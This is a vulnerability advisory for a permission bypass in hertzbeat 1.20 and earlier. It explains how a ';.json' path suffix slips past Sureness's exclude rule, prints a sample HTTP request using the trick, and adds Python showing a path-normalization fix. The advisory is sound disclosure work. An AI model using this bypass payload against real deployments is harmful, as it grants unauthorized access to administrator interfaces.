Impact
hertzbeat <= 1.20 has a permission bypass vulnerability
Permission bypass is a Web security vulnerability. It can bypass system authentication and invoke interfaces without authorization. As a result, the site is in an insecure state, such as directly invoking interfaces used by administrators.
Patches
You are advised to upgrade to the latest version.
Workarounds
You are advised to upgrade to the latest version.
References
https://github.com/dromara/hertzbeat
For more information
Sureness checks the excludeResource list first. If the request URL matches an exclude rule, Sureness lets the request through directly; if not, it enters the subsequent authentication process. Because the exclude rule matches request URLs ending in .json, a request URL that contains a ';', such as /aaa;.json, matches the exclude rule and is let through without authentication. Spring Boot then treats the ';.json' part as a path parameter, so the request is routed to /aaa.
GET /api/monitors;.json?app=linux&pageIndex=0&pageSize=8 HTTP/1.1
Host: 1.15.182.88:1157
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Referer: http://1.15.182.88:1157/monitors?app=linux
Accept-Encoding: gzip, deflate
Connection: close
Normal access request:
Normal access request without Authorization:
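As an added illustration, not taken from the advisory or from the hertzbeat/Sureness code, the Python below contrasts matching the exclude rule against the raw request path with matching it against the path the framework will actually route, after dropping ';...' matrix-variable content the way Spring MVC does by default. The exclude pattern `.*\.json$` is an assumed stand-in for the project's real rule.

```python
import re
from urllib.parse import urlsplit

# Assumed stand-in for an excludeResource rule that matches URLs ending in ".json".
EXCLUDE_PATTERNS = [re.compile(r".*\.json$")]


def strip_matrix_params(path: str) -> str:
    """Drop ';...' content from every path segment.

    Spring MVC's UrlPathHelper does this by default (removeSemicolonContent),
    so "/api/monitors;.json" is routed to "/api/monitors".
    Only a literal ';' is handled here; percent-encoded forms are out of scope.
    """
    return "/".join(segment.split(";", 1)[0] for segment in path.split("/"))


def routed_path(raw_url: str) -> str:
    """Path the controller will actually receive for a raw request URL."""
    return strip_matrix_params(urlsplit(raw_url).path)


def is_excluded_naive(raw_url: str) -> bool:
    """Vulnerable check: exclude rules are applied to the raw path, before
    the framework removes the ';.json' suffix."""
    path = urlsplit(raw_url).path
    return any(p.match(path) for p in EXCLUDE_PATTERNS)


def is_excluded_normalized(raw_url: str) -> bool:
    """Hardened check: exclude rules are applied to the same normalized path
    the framework will route, so the suffix trick no longer matches."""
    return any(p.match(routed_path(raw_url)) for p in EXCLUDE_PATTERNS)


def requires_auth(raw_url: str, hardened: bool = True) -> bool:
    """True when the request must go through authentication."""
    check = is_excluded_normalized if hardened else is_excluded_naive
    return not check(raw_url)


if __name__ == "__main__":
    # Constructed sample URL shaped like the request shown in the advisory.
    url = "/api/monitors;.json?app=linux&pageIndex=0&pageSize=8"
    print("routed to:", routed_path(url))
    print("naive check requires auth:", requires_auth(url, hardened=False))
    print("normalized check requires auth:", requires_auth(url, hardened=True))
```

A genuine static resource such as /static/app.json is still excluded by the hardened check, so the fix does not break the intended exclusion.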